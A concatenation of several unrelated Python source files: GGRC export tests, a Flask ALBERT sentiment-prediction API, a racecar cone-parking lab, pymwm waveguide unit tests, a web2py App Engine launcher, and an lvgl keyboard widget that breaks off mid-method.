"object_name": "TaskGroup", # tg-1, tg-2
"filters": {
"expression": {
"op": {"name": "relevant"},
"object_name": "__previous__",
"ids": ["0"],
},
},
"fields": "all",
},
]
response = self.export_csv(data).data
self.assertEqual(3, response.count("wf-1")) # 1 for wf and 1 on each tg
self.assertIn("tg-1", response)
self.assertIn("tg-6", response)
def test_tg_task(self):
""" test task group and task mappings """
data = [
{
"object_name": "TaskGroupTask", # task-1, task-7
"filters": {
"expression": {
"op": {"name": "relevant"},
"object_name": "TaskGroup",
"slugs": ["tg-1"],
},
},
"fields": "all",
}, {
"object_name": "TaskGroup", # tg-1, tg-2
"filters": {
"expression": {
"op": {"name": "relevant"},
"object_name": "__previous__",
"ids": ["0"],
},
},
"fields": "all",
},
]
response = self.export_csv(data).data
self.assertEqual(3, response.count("tg-1")) # 2 for tasks and 1 for tg
self.assertIn("task-1", response)
self.assertIn("task-7", response)
def test_workflow_cycle_mapping(self):
""" test workflow and cycle mappings """
data = [
{
"object_name": "Cycle", # cycle with title wf-1
"filters": {
"expression": {
"op": {"name": "relevant"},
"object_name": "Workflow",
"slugs": ["wf-1"],
},
},
"fields": "all",
}, {
"object_name": "Workflow", # wf-1
"filters": {
"expression": {
"op": {"name": "relevant"},
"object_name": "__previous__",
"ids": ["0"],
},
},
"fields": "all",
}, {
"object_name": "CycleTaskGroup", # two cycle groups
"filters": {
"expression": {
"op": {"name": "relevant"},
"object_name": "__previous__",
"ids": ["0"],
},
},
"fields": "all",
}, {
"object_name": "Cycle", # sholud be same cycle as in first block
"filters": {
"expression": {
"op": {"name": "relevant"},
"object_name": "__previous__",
"ids": ["2"],
},
},
"fields": "all",
}, {
# Task mapped to any of the two task groups, 3 tasks
"object_name": "CycleTaskGroupObjectTask",
"filters": {
"expression": {
"op": {"name": "relevant"},
"object_name": "__previous__",
"ids": ["2"],
},
},
"fields": "all",
}, {
"object_name": "CycleTaskGroup", # two cycle groups
"filters": {
"expression": {
"op": {"name": "relevant"},
"object_name": "__previous__",
"ids": ["4"],
},
},
"fields": "all",
},
]
response = self.export_csv(data).data
self.assertEqual(3, response.count("wf-1")) # 2 for cycles and 1 for wf
# 3rd block = 2, 5th block = 3, 6th block = 2.
self.assertEqual(7, response.count("CYCLEGROUP-"))
self.assertEqual(9, response.count("CYCLE-"))
self.assertEqual(3, response.count("CYCLETASK-"))
  def test_cycle_tasks_objects(self):
""" test cycle task and various objects """
data = [
{
"object_name": "CycleTaskGroupObjectTask", #
"filters": {
"expression": {
"op": {"name": "relevant"},
"object_name": "Policy",
"slugs": ["p1"],
},
},
"fields": "all",
}, {
"object_name": "Policy", #
"filters": {
"expression": {
"op": {"name": "relevant"},
"object_name": "__previous__",
"ids": ["0"],
},
},
"fields": ["slug", "title"],
},
]
response = self.export_csv(data).data
self.assertEqual(2, response.count("CYCLETASK-"))
self.assertEqual(3, response.count(",p1,"))
def test_wf_indirect_relevant_filters(self):
""" test related filter for indirect relationships on wf objects """
def block(obj):
return {
"object_name": obj,
"fields": ["slug"],
"filters": {
"expression": {
"object_name": "Policy",
"op": {"name": "relevant"},
"slugs": ["p1"],
},
},
}
data = [
block("Workflow"),
block("Cycle"),
block("CycleTaskGroup"),
block("CycleTaskGroupObjectTask"),
]
response = self.export_csv(data).data
wf = Workflow.query.filter_by(slug="wf-1").first()
cycle = wf.cycles[0]
cycle_tasks = []
for cycle_task in cycle.cycle_task_group_object_tasks:
is_related = False
for related_object in cycle_task.related_objects():
if related_object.slug == "p1":
is_related = True
if is_related:
cycle_tasks.append(cycle_task)
cycle_task_groups = list({cycle_task.cycle_task_group
for cycle_task in cycle_tasks})
self.assertEqual(1, response.count("wf-"))
self.assertRegexpMatches(response, ",{}[,\r\n]".format(wf.slug))
self.assertEqual(1, response.count("CYCLE-"))
self.assertRegexpMatches(response, ",{}[,\r\n]".format(cycle.slug))
self.assertEqual(1, response.count("CYCLEGROUP-"))
self.assertEqual(1, len(cycle_task_groups))
self.assertRegexpMatches(response, ",{}[,\r\n]".format(
cycle_task_groups[0].slug))
self.assertEqual(2, response.count("CYCLETASK-"))
self.assertEqual(2, len(cycle_tasks))
for cycle_task in cycle_tasks:
self.assertRegexpMatches(response, ",{}[,\r\n]".format(
cycle_task.slug))
destinations = [
("Workflow", wf.slug, 3),
("Cycle", cycle.slug, 3),
("CycleTaskGroupObjectTask", cycle_tasks[0].slug, 1),
("CycleTaskGroupObjectTask", cycle_tasks[1].slug, 1),
]
for object_name, slug, count in destinations:
data = [{
"object_name": "Policy",
"fields": ["slug"],
"filters": {
"expression": {
"object_name": object_name,
"op": {"name": "relevant"},
"slugs": [slug],
},
},
}]
response = self.export_csv(data).data
self.assertEqual(count, response.count(",p"), "Count for " + object_name)
self.assertIn(",p1", response)
|
py | 1a40beefac41dec9595ad2bf76c0f785916e251a | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2020/12/23 4:56 PM
# @File : main.trainer_predict_api.py
# @Author: johnson
# @Contact : github: johnson7788
# @Desc :
import logging
logging.basicConfig(
format='%(asctime)s - %(levelname)s - %(name)s - %(message)s',
datefmt='%Y/%m/%d %H:%M:%S',
level=logging.INFO,
)
logger = logging.getLogger("Main")
import os, random, time
import numpy as np
import torch
from transformers import AlbertConfig
from pytorch_pretrained_bert import BertTokenizer
from modeling import AlbertSPC, BertForGLUESimpleAdaptorTraining
from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler, DistributedSampler
from tqdm import tqdm
from utils_glue import InputExample, convert_examples_to_features
import argparse
from flask import Flask, request, jsonify, abort
######################################################
# Predict with the non-distilled model, wrapped as a Flask API
######################################################
app = Flask(__name__)
def load_examples(contents, max_seq_length, tokenizer, label_list):
"""
:param contents: eg: [('苹果很好用', '苹果')]
:param max_seq_length:
    :param tokenizer: an initialized tokenizer
:param label_list:
:return:
"""
examples = []
for guid, content in enumerate(contents):
sentence, aspect = content
examples.append(
InputExample(guid=guid, text_a=sentence, text_b=aspect))
features = convert_examples_to_features(examples, label_list, max_seq_length, tokenizer,
output_mode="classification",
cls_token_segment_id=0, pad_token_segment_id=0)
all_input_ids = torch.tensor([f.input_ids for f in features], dtype=torch.long)
all_input_mask = torch.tensor([f.input_mask for f in features], dtype=torch.long)
all_segment_ids = torch.tensor([f.segment_ids for f in features], dtype=torch.long)
dataset = TensorDataset(all_input_ids, all_input_mask, all_segment_ids)
return dataset
class TorchAsBertModel(object):
def __init__(self, verbose=0):
self.verbose = verbose
self.label_list = ["是", "否"]
self.num_labels = len(self.label_list)
        # Decide which device to use
self.device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
self.n_gpu = torch.cuda.device_count() if torch.cuda.is_available() else 0
self.tokenizer, self.model = self.load_model()
        # Maximum truncation lengths for the left/right context of the sentence
self.left_max_seq_len = 15
self.right_max_seq_len = 20
self.aspect_max_seq_len = 30
def load_model(self):
parser = argparse.ArgumentParser()
args = parser.parse_args()
args.output_encoded_layers = True
args.output_attention_layers = True
args.output_att_score = True
args.output_att_sum = True
self.args = args
        # Parse the config files; the teacher and student models share the same vocab
        self.vocab_file = "albert_model/vocab.txt"
        # The teacher config and the fine-tuned teacher model are used here; they can be
        # swapped for the student config and the distilled student model
# student config: config/chinese_bert_config_L4t.json
# distil student model: distil_model/gs8316.pkl
self.bert_config_file_S = "albert_model/config.json"
self.tuned_checkpoint_S = "trained_teacher_model/test_components.pkl"
self.max_seq_length = 70
        # Batch size used for prediction
        self.predict_batch_size = 64
        # Load the student config and check that the max sequence length fits within the configured limit
bert_config_S = AlbertConfig.from_json_file(self.bert_config_file_S)
bert_config_S.num_labels = self.num_labels
        # Load the tokenizer
        tokenizer = BertTokenizer(vocab_file=self.vocab_file)
        # Load the model
model_S = AlbertSPC(bert_config_S)
state_dict_S = torch.load(self.tuned_checkpoint_S, map_location=self.device)
model_S.load_state_dict(state_dict_S)
if self.verbose:
print("模型已加载")
return tokenizer, model_S
def truncate(self, input_text, max_len, trun_post='post'):
"""
        Truncate the input text to at most max_len characters.
        :param input_text:
        :param max_len: eg: 15
        :param trun_post: truncation direction, i.e. which part to keep:
        "pre": keep the leading part, "post": keep the trailing part
:return:
"""
if max_len is not None and len(input_text) > max_len:
if trun_post == "post":
return input_text[-max_len:]
else:
return input_text[:max_len]
else:
return input_text
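    # Illustrative note (a sketch of the behaviour above, not original code): with
    # trun_post="post" the trailing max_len characters are kept, e.g.
    # truncate("abcdefgh", 5) -> "defgh", while trun_post="pre" keeps the leading
    # ones, truncate("abcdefgh", 5, "pre") -> "abcde". clean() below relies on this
    # to keep the text nearest the aspect on both sides.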
def clean(self, text_left, aspect, text_right):
"""
        Truncate the left context, aspect, and right context.
:param text_left:
:param aspect:
:param text_right:
:return:
"""
text_left = self.truncate(text_left, self.left_max_seq_len)
aspect = self.truncate(aspect, self.aspect_max_seq_len)
text_right = self.truncate(text_right, self.right_max_seq_len, trun_post="pre")
return text_left, aspect, text_right
def predict_batch(self, data):
"""
        Process a batch of data.
        :param data: a list of items to process
:return:
"""
contents = []
for one_data in data:
content, aspect, aspect_start, aspect_end = one_data
text_left = content[:aspect_start]
text_right = content[aspect_end:]
text_left, aspect, text_right = self.clean(text_left, aspect, text_right)
new_content = text_left + aspect + text_right
contents.append((new_content, aspect))
eval_dataset = load_examples(contents, self.max_seq_length, self.tokenizer, self.label_list)
if self.verbose:
print("评估数据集已加载")
res = self.do_predict(self.model, eval_dataset)
if self.verbose:
print(f"预测的结果是: {res}, {[self.label_list[id] for id in res]}")
# TODO 输入为一条数据,返回也只返回一条结果即可以了
return res
def predict_batch_without_turncate(self, data):
"""
        Process a batch of data.
        :param data: a list of items to process, [(content,aspect),...,]
:return:
"""
eval_dataset = load_examples(data, self.max_seq_length, self.tokenizer, self.label_list)
if self.verbose:
print("评估数据集已加载")
res = self.do_predict(self.model, eval_dataset)
if self.verbose:
print(f"预测的结果是: {res}, {[self.label_list[id] for id in res]}")
#把id变成标签
result = [self.label_list[r] for r in res]
return result
def do_predict(self, model, eval_dataset):
        # Task name
results = []
if self.verbose:
print("***** 开始预测 *****")
print(" 样本数 = %d", len(eval_dataset))
print(" Batch size = %d", self.predict_batch_size)
        # Evaluation samples
eval_sampler = SequentialSampler(eval_dataset)
eval_dataloader = DataLoader(eval_dataset, sampler=eval_sampler, batch_size=self.predict_batch_size)
model.eval()
model.to(self.device)
        # Start time
start_time = time.time()
        # Store the predicted logits
pred_logits = []
        for batch in tqdm(eval_dataloader, desc="Evaluating", disable=True):
input_ids, input_mask, segment_ids = batch
input_ids = input_ids.to(self.device)
input_mask = input_mask.to(self.device)
segment_ids = segment_ids.to(self.device)
with torch.no_grad():
logits = model(input_ids, input_mask, segment_ids)
cpu_logits = logits.detach().cpu()
for i in range(len(cpu_logits)):
pred_logits.append(cpu_logits[i].numpy())
pred_logits = np.array(pred_logits)
        # Pick the label with the highest probability
preds = np.argmax(pred_logits, axis=1)
if self.verbose:
print(f"preds: {preds}")
results.extend(preds.tolist())
cost_time = time.time() - start_time
if self.verbose:
print(
f"--- 评估{len(eval_dataset)}条数据的总耗时是 {cost_time} seconds, 每条耗时 {cost_time / len(eval_dataset)} seconds ---")
return results
@app.route("/api", methods=['POST'])
def api():
"""
Args:
        test_data: the data to predict on, a list of text pairs, [(content,aspect),...,]
Returns:
"""
jsonres = request.get_json()
test_data = jsonres.get('data', None)
model = TorchAsBertModel()
results = model.predict_batch_without_turncate(test_data)
return jsonify(results)
if __name__ == "__main__":
app.run(host='0.0.0.0', port=5000, debug=True, threaded=True)
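# Example client call (a usage sketch, assuming the server above is running on its
# default host/port and a trained checkpoint is in place; the sample pair mirrors
# the example in load_examples' docstring):
#     import requests
#     resp = requests.post("http://127.0.0.1:5000/api",
#                          json={"data": [["苹果很好用", "苹果"]]})
#     print(resp.json())  # one "是"/"否" label per (content, aspect) pair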
|
py | 1a40bf2f730b3869f884e394f878e6cc92957491 |
def do():
import trimesh
return trimesh.creation.icosphere().convex_hull
if __name__ == '__main__':
do()
|
py | 1a40bfdaaf7152ef0f602442a668dc8eaf63379b | """
Copyright MIT and Harvey Mudd College
MIT License
Summer 2020
Lab 2B - Color Image Cone Parking
"""
########################################################################################
# Imports
########################################################################################
import sys
import cv2 as cv
import numpy as np
from enum import IntEnum
sys.path.insert(1, "../../library")
import racecar_core
import racecar_utils as rc_utils
########################################################################################
# Global variables
########################################################################################
rc = racecar_core.create_racecar()
# >> Constants
# The smallest contour we will recognize as a valid contour
MIN_CONTOUR_AREA = 30
# The HSV range for the color orange, stored as (hsv_min, hsv_max)
ORANGE = ((10, 100, 100), (20, 255, 255))
# >> Variables
speed = 0.0 # The current speed of the car
angle = 0.0 # The current angle of the car's wheels
contour_center = None # The (pixel row, pixel column) of contour
contour_area = 0 # The area of contour
########################################################################################
# Functions
########################################################################################
class State(IntEnum):
search = 0
obstacle = 1
approach = 2
stop = 3
curState = State.search
def update_contour():
"""
Finds contours in the current color image and uses them to update contour_center
and contour_area
"""
global contour_center
global contour_area
image = rc.camera.get_color_image()
if image is None:
contour_center = None
contour_area = 0
else:
# Find all of the orange contours
contours = rc_utils.find_contours(image, ORANGE[0], ORANGE[1])
# Select the largest contour
contour = rc_utils.get_largest_contour(contours, MIN_CONTOUR_AREA)
if contour is not None:
# Calculate contour information
contour_center = rc_utils.get_contour_center(contour)
contour_area = rc_utils.get_contour_area(contour)
# Draw contour onto the image
rc_utils.draw_contour(image, contour)
rc_utils.draw_circle(image, contour_center)
else:
contour_center = None
contour_area = 0
# Display the image to the screen
rc.display.show_color_image(image)
def start():
"""
This function is run once every time the start button is pressed
"""
global speed
global angle
# Initialize variables
speed = 0
angle = 0
# Set initial driving speed and angle
rc.drive.set_speed_angle(speed, angle)
# Set update_slow to refresh every half second
rc.set_update_slow_time(0.5)
# Print start message
print(">> Lab 2B - Color Image Cone Parking")
def update():
"""
After start() is run, this function is run every frame until the back button
is pressed
"""
global speed
global angle
global curState
# Search for contours in the current color image
update_contour()
imgX = rc.camera.get_width()
if contour_center is not None:
angle = rc_utils.remap_range(contour_center[1],0,imgX,-1,1)
# TODO: Park the car 30 cm away from the closest orange cone
if curState == State.search:
rc.drive.set_speed_angle(0.5, 1)
if contour_center is not None:
curState = State.approach
# elif curState == State.obstacle:
elif curState == State.approach:
# rc.drive.set_speed_angle(0.5, angle)
if contour_area < 3110:
rc.drive.set_speed_angle(0.35,angle)
elif contour_area >= 3110 and contour_area < 17670 :
rc.drive.set_speed_angle(0.2,angle)
elif contour_area >= 17670 and contour_area < 25000:
rc.drive.set_speed_angle(0.01,angle)
elif contour_area > 26450:
curState = State.stop
print("stop")
elif curState == State.stop:
rc.drive.set_speed_angle(0,0)
    # distance-to-contour-area calibration (distances are in cm, not m):
    # ~101 cm = 3110 px, ~40 cm = 17670 px, ~30 cm = 27353 px
# Print the current speed and angle when the A button is held down
if rc.controller.is_down(rc.controller.Button.A):
print("Speed:", speed, "Angle:", angle)
# Print the center and area of the largest contour when B is held down
if rc.controller.is_down(rc.controller.Button.B):
if contour_center is None:
print("No contour found")
else:
print("Center:", contour_center, "Area:", contour_area)
def update_slow():
"""
After start() is run, this function is run at a constant rate that is slower
than update(). By default, update_slow() is run once per second
"""
# Print a line of ascii text denoting the contour area and x position
if rc.camera.get_color_image() is None:
# If no image is found, print all X's and don't display an image
print("X" * 10 + " (No image) " + "X" * 10)
else:
# If an image is found but no contour is found, print all dashes
if contour_center is None:
print("-" * 32 + " : area = " + str(contour_area))
# Otherwise, print a line of dashes with a | indicating the contour x-position
else:
s = ["-"] * 32
s[int(contour_center[1] / 20)] = "|"
print("".join(s) + " : area = " + str(contour_area))
########################################################################################
# DO NOT MODIFY: Register start and update and begin execution
########################################################################################
if __name__ == "__main__":
rc.set_start_update(start, update, update_slow)
rc.go() |
py | 1a40c161e4d64e9075b921103bce50e2f4540516 | import unittest
import numpy as np
import numpy.testing as npt
import ray
import pymwm
from pymwm.cylinder.samples import Samples, SamplesForRay
class TestCylinderSamples(unittest.TestCase):
def setUp(self):
betas = []
convs = []
betas.append(
[
1.32930242e-03 + 15.97093724j,
-4.12022699e-04 + 36.77569389j,
-2.96423554e-03 + 57.67676409j,
4.25706586e-01 + 22.16438948j,
1.16961605e00 + 39.91871066j,
]
)
convs.append([True, True, True, True, True])
betas.append(
[
3.93618487e-04 + 25.50725697j,
-1.69749464e-03 + 46.75220214j,
-3.60166883e-03 + 67.81044568j,
1.88412925e-01 + 10.63429198j,
6.65409650e-01 + 30.69581722j,
]
)
convs.append([True, True, True, True, True])
betas.append(
[
-3.14039183e-04 + 34.21067616j,
-3.02497952e-03 + 56.09987523j,
-3.99382568e-03 + 77.45436569j,
3.16581667e-01 + 17.70646046j,
9.90337935e-01 + 38.34855698j,
]
)
convs.append([True, True, True, True, True])
betas.append(
[
-1.22828011e-03 + 42.51416161j,
-3.77291544e-03 + 65.06037821j,
-4.27041215e-03 + 86.7578285j,
4.45859022e-01 + 24.35935701j,
1.56012941e00 + 45.43872731j,
]
)
convs.append([True, True, True, True, True])
betas.append(
[
-0.00274348 + 50.57304098j,
-0.00424744 + 73.75302452j,
-0.00448273 + 95.80756518j,
0.58332927 + 30.80613956j,
2.57935560 + 52.37067052j,
]
)
convs.append([True, True, True, True, True])
betas.append(
[
-0.00422390 + 58.46301045j,
-0.00458645 + 82.24672285j,
-0.00465523 + 104.65914944j,
0.73689393 + 37.1144517j,
3.79669182 + 59.48095715j,
]
)
convs.append([True, True, True, True, True])
self.betas = np.array(betas)
self.convs = np.array(convs)
self.params = {
"core": {"shape": "cylinder", "size": 0.15, "fill": {"RI": 1.0}},
"clad": {"book": "Au", "page": "Stewart-DLF", "bound_check": False},
"modes": {
"wl_max": 5.0,
"wl_min": 1.0,
"wl_imag": 50.0,
"dw": 1.0 / 64,
"num_n": 6,
"num_m": 2,
},
}
def test_attributes(self):
params: dict = self.params.copy()
size: float = params["core"]["size"]
fill = params["core"]["fill"]
clad = params["clad"]
wg = Samples(size, fill, clad, params["modes"])
p = params["modes"]
ind_w_min = int(np.floor(2 * np.pi / p["wl_max"] / p["dw"]))
ind_w_max = int(np.ceil(2 * np.pi / p["wl_min"] / p["dw"]))
ind_w_imag = int(np.ceil(2 * np.pi / p["wl_imag"] / p["dw"]))
ws = np.arange(ind_w_min, ind_w_max + 1) * p["dw"]
wis = -np.arange(ind_w_imag + 1) * p["dw"]
npt.assert_equal(wg.ws, ws)
npt.assert_equal(wg.wis, wis)
def test_beta2_pec(self):
params: dict = self.params.copy()
size: float = params["core"]["size"]
fill = params["core"]["fill"]
clad = params["clad"]
wg = Samples(size, fill, clad, params["modes"])
w = 2 * np.pi / 5.0
pec0 = (
np.array(
[
7.9914227540830467j,
18.389529559512987j,
28.838915878616223j,
12.756889235180587j,
23.376846509563137j,
]
)
* 2
)
npt.assert_almost_equal(wg.beta2_pec(w, 0), pec0 ** 2)
pec1 = (
np.array(
[
12.756889235180589j,
23.376846509563137j,
33.90573916009118j,
6.1050317506026381j,
17.760365196297929j,
]
)
* 2
)
npt.assert_almost_equal(wg.beta2_pec(w, 1), pec1 ** 2)
pec2 = (
np.array(
[
17.107206360452462j,
28.050444310850633j,
38.72770732091869j,
10.161382581946896j,
22.344945200686148j,
]
)
* 2
)
npt.assert_almost_equal(wg.beta2_pec(w, 2), pec2 ** 2)
pec3 = (
np.array(
[
21.257922769420034j,
32.530676457118169j,
43.37945228513604j,
13.989860591754667j,
26.710066174072818j,
]
)
* 2
)
npt.assert_almost_equal(wg.beta2_pec(w, 3), pec3 ** 2)
pec4 = (
np.array(
[
25.286669814449052j,
36.877012636462631j,
47.90433520177347j,
17.71403733166369j,
30.934940730583346j,
]
)
* 2
)
npt.assert_almost_equal(wg.beta2_pec(w, 4), pec4 ** 2)
pec5 = (
np.array(
[
29.231527454256089j,
41.123881000095977j,
52.330141681593268j,
21.376155694373626j,
35.060573334299526j,
]
)
* 2
)
npt.assert_almost_equal(wg.beta2_pec(w, 5), pec5 ** 2)
def test_beta2_w_min(self):
params: dict = {
"core": {"shape": "cylinder", "size": 0.15, "fill": {"RI": 1.0}},
"clad": {"book": "Au", "page": "Stewart-DLF", "bound_check": False},
"modes": {"num_n": 6, "num_m": 2},
}
size = params["core"]["size"]
fill = params["core"]["fill"]
clad = params["clad"]
wg = Samples(size, fill, clad, params["modes"])
self.assertEqual(wg.ws[0], 1.25)
num_n = params["modes"]["num_n"]
ray.shutdown()
try:
ray.init()
p_modes_id = ray.put(params["modes"])
pool = ray.util.ActorPool(
SamplesForRay.remote(size, fill, clad, p_modes_id) for _ in range(num_n)
)
vals = list(
pool.map(lambda a, arg: a.beta2_w_min.remote(arg), range(num_n))
)
finally:
ray.shutdown()
for n in range(6):
print(n)
h2s, success = vals[n]
print(success)
npt.assert_allclose(h2s, self.betas[n] * self.betas[n], rtol=1e-6)
def test_db(self):
params: dict = self.params.copy()
size = params["core"]["size"]
fill = params["core"]["fill"]
clad = params["clad"]
wg = Samples(size, fill, clad, params["modes"])
try:
betas, convs = wg.database.load()
except IndexError:
num_n = params["modes"]["num_n"]
ray.shutdown()
try:
ray.init()
p_modes_id = ray.put(params["modes"])
pool = ray.util.ActorPool(
SamplesForRay.remote(size, fill, clad, p_modes_id)
for _ in range(num_n)
)
xs_success_list = list(
pool.map(lambda a, arg: a.task.remote(arg), range(num_n))
)
finally:
ray.shutdown()
betas, convs = wg.betas_convs(xs_success_list)
wg.database.save(betas, convs)
for n in range(6):
print(n)
npt.assert_allclose(
[
betas[("M", n, 1)][0, 0],
betas[("M", n, 2)][0, 0],
betas[("E", n, 1)][0, 0],
betas[("E", n, 2)][0, 0],
],
[
self.betas[n][0],
self.betas[n][1],
self.betas[n][3],
self.betas[n][4],
],
)
self.assertEqual(
[
convs[("M", n, 1)][0, 0],
convs[("M", n, 2)][0, 0],
convs[("E", n, 1)][0, 0],
convs[("E", n, 2)][0, 0],
],
[
self.convs[n][0],
self.convs[n][1],
self.convs[n][3],
self.convs[n][4],
],
)
def test_interpolation(self):
params: dict = self.params.copy()
size = params["core"]["size"]
fill = params["core"]["fill"]
clad = params["clad"]
wg = Samples(size, fill, clad, params["modes"])
try:
betas, convs = wg.database.load()
except IndexError:
num_n = params["modes"]["num_n"]
ray.shutdown()
try:
ray.init()
p_modes_id = ray.put(params["modes"])
pool = ray.util.ActorPool(
SamplesForRay.remote(size, fill, clad, p_modes_id)
for _ in range(num_n)
)
xs_success_list = list(
pool.map(lambda a, arg: a.task.remote(arg), range(num_n))
)
finally:
ray.shutdown()
betas, convs = wg.betas_convs(xs_success_list)
wg.database.save(betas, convs)
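        # Evaluate wg.v for every sample point, then build interpolated beta(w) functions
        # restricted to the requested wavelength window.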
vs = {}
for key in betas.keys():
h2s = betas[key] ** 2
ws = wg.ws
vs[key] = np.array([wg.v(h2, w, wg.clad(w)) for h2, w in zip(h2s, ws)])
beta_funcs = wg.database.interpolation(
betas, convs, vs, bounds={"wl_max": 3.0, "wl_min": 1.0, "wl_imag": 100.0}
)
self.assertAlmostEqual(
beta_funcs[(("M", 0, 1), "real")](2 * np.pi, 0.0)[0, 0],
0.011030829731291485,
)
self.assertAlmostEqual(
beta_funcs[(("M", 0, 1), "imag")](2 * np.pi, 0.0)[0, 0], 14.374412149329419
)
self.assertAlmostEqual(
beta_funcs[(("M", 1, 1), "real")](2 * np.pi, 0.0)[0, 0],
0.0024442176360349316,
)
self.assertAlmostEqual(
beta_funcs[(("M", 1, 1), "imag")](2 * np.pi, 0.0)[0, 0], 24.573875828863905
)
self.assertAlmostEqual(
beta_funcs[(("E", 1, 1), "real")](2 * np.pi, 0.0)[0, 0], 0.07516250767481286
)
self.assertAlmostEqual(
beta_funcs[(("E", 1, 1), "imag")](2 * np.pi, 0.0)[0, 0], 8.2795729054555345
)
self.assertAlmostEqual(
beta_funcs[(("E", 1, 2), "real")](2 * np.pi, 0.0)[0, 0], 0.1884476108781034
)
self.assertAlmostEqual(
beta_funcs[(("E", 1, 2), "imag")](2 * np.pi, 0.0)[0, 0], 29.74494425189081
)
self.assertAlmostEqual(
beta_funcs[(("E", 2, 1), "real")](2 * np.pi, 0.0)[0, 0], 0.10224849620607172
)
self.assertAlmostEqual(
beta_funcs[(("E", 2, 1), "imag")](2 * np.pi, 0.0)[0, 0], 16.184787946722981
)
self.assertAlmostEqual(
beta_funcs[(("E", 3, 1), "real")](2 * np.pi, 0.0)[0, 0], 0.1353140706821849
)
self.assertAlmostEqual(
beta_funcs[(("E", 3, 1), "imag")](2 * np.pi, 0.0)[0, 0], 23.102611360449739
)
self.assertAlmostEqual(
beta_funcs[(("E", 4, 1), "real")](2 * np.pi, 0.0)[0, 0], 0.1720347941605904
)
self.assertAlmostEqual(
beta_funcs[(("E", 4, 1), "imag")](2 * np.pi, 0.0)[0, 0], 29.661836787913028
)
def test_eig_mat(self):
size = self.params["core"]["size"]
fill = self.params["core"]["fill"]
clad = self.params["clad"]
wg = Samples(size, fill, clad, self.params["modes"])
h2 = -35513.94604091 - 6.53379717e5j
w = 2 * np.pi / 100.0
e1 = wg.fill(w)
e2 = wg.clad(w) * 100
eps = 1e-4
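        # eig_mat returns the eigenvalue matrix together with its analytic derivative with respect
        # to h2; check that derivative against a central finite difference for the 'M' and 'E' families.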
a, b = wg.eig_mat(h2, w, "M", 0, e1, e2)
a1, b1 = wg.eig_mat(h2 + eps, w, "M", 0, e1, e2)
a2, b2 = wg.eig_mat(h2 - eps, w, "M", 0, e1, e2)
da_dh2 = (a1 - a2) / (2 * eps)
npt.assert_almost_equal(b, da_dh2)
a, b = wg.eig_mat(h2, w, "E", 0, e1, e2)
a1, b1 = wg.eig_mat(h2 + eps, w, "E", 0, e1, e2)
a2, b2 = wg.eig_mat(h2 - eps, w, "E", 0, e1, e2)
da_dh2 = (a1 - a2) / (2 * eps)
npt.assert_almost_equal(b, da_dh2)
a, b = wg.eig_mat(h2, w, "M", 2, e1, e2)
a1, b1 = wg.eig_mat(h2 + eps, w, "M", 2, e1, e2)
a2, b2 = wg.eig_mat(h2 - eps, w, "M", 2, e1, e2)
da_dh2 = (a1 - a2) / (2 * eps)
npt.assert_almost_equal(b, da_dh2)
if __name__ == "__main__":
unittest.main()
|
py | 1a40c1ffe2f0635dabb4a1fed683643ecf57c281 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
This file is part of the web2py Web Framework
Copyrighted by Massimo Di Pierro <[email protected]>
License: LGPLv3 (http://www.gnu.org/licenses/lgpl.html)
"""
##############################################################################
# Configuration parameters for Google App Engine
##############################################################################
KEEP_CACHED = False # request a dummy url every 10 seconds to keep the app cached
LOG_STATS = False # web2py level log statistics
APPSTATS = True # GAE level usage statistics and profiling
DEBUG = False # debug mode
AUTO_RETRY = True # force gae to retry commit on failure
#
# Read more about APPSTATS here
# http://googleappengine.blogspot.com/2010/03/easy-performance-profiling-with.html
# can be accessed from:
# http://localhost:8080/_ah/stats
##############################################################################
# All tricks in this file developed by Robin Bhattacharyya
##############################################################################
import time
import os
import sys
import logging
import cPickle
import pickle
import wsgiref.handlers
import datetime
path = os.path.dirname(os.path.abspath(__file__))
sys.path = [path] + [p for p in sys.path if p != path]
sys.modules['cPickle'] = sys.modules['pickle']
from gluon.settings import global_settings
from google.appengine.api.labs import taskqueue
from google.appengine.ext import webapp
from google.appengine.ext.webapp.util import run_wsgi_app
global_settings.web2py_runtime_gae = True
if os.environ.get('SERVER_SOFTWARE', '').startswith('Devel'):
(global_settings.web2py_runtime, DEBUG) = \
('gae:development', True)
else:
(global_settings.web2py_runtime, DEBUG) = \
('gae:production', False)
import gluon.main
def log_stats(fun):
"""Function that will act as a decorator to make logging"""
def newfun(env, res):
"""Log the execution time of the passed function"""
timer = lambda t: (t.time(), t.clock())
(t0, c0) = timer(time)
executed_function = fun(env, res)
(t1, c1) = timer(time)
log_info = """**** Request: %.2fms/%.2fms (real time/cpu time)"""
log_info = log_info % ((t1 - t0) * 1000, (c1 - c0) * 1000)
logging.info(log_info)
return executed_function
return newfun
logging.basicConfig(level=logging.INFO)
def wsgiapp(env, res):
"""Return the wsgiapp"""
if env['PATH_INFO'] == '/_ah/queue/default':
if KEEP_CACHED:
delta = datetime.timedelta(seconds=10)
taskqueue.add(eta=datetime.datetime.now() + delta)
res('200 OK',[('Content-Type','text/plain')])
return ['']
env['PATH_INFO'] = env['PATH_INFO'].encode('utf8')
return gluon.main.wsgibase(env, res)
if LOG_STATS or DEBUG:
wsgiapp = log_stats(wsgiapp)
if AUTO_RETRY:
from gluon.contrib.gae_retry import autoretry_datastore_timeouts
autoretry_datastore_timeouts()
def main():
"""Run the wsgi app"""
if APPSTATS:
run_wsgi_app(wsgiapp)
else:
wsgiref.handlers.CGIHandler().run(wsgiapp)
if __name__ == '__main__':
main()
|
py | 1a40c210600638c6abd58d78e4688456955d6a83 | # -*- coding: utf-8 -*-
#
# michael a.g. aïvázis <[email protected]>
# parasim
# (c) 1998-2021 all rights reserved
#
# the action protocol
from .Action import Action as action
# and the base command panel
from .Command import Command as command
# factories for the local objects
from .Ampcor import Ampcor as ampcor
# end of file
|
py | 1a40c23164d3e706b5ef2d6ab3265f691d10fe5d | """A keyboard with a hint when you press it"""
import lvgl as lv
from ..decorators import feed_touch
from .theme import styles
class HintKeyboard(lv.btnm):
def __init__(self, scr, *args, **kwargs):
super().__init__(scr, *args, **kwargs)
self.hint = lv.btn(scr)
self.hint.set_size(50, 60)
self.hint_lbl = lv.label(self.hint)
self.hint_lbl.set_text(" ")
self.hint_lbl.set_style(0, styles["title"])
self.hint_lbl.set_size(50, 60)
self.hint.set_hidden(True)
self.callback = None
super().set_event_cb(self.cb)
def set_event_cb(self, callback):
self.callback = callback
def get_event_cb(self):
return self.callback
def cb(self, obj, event):
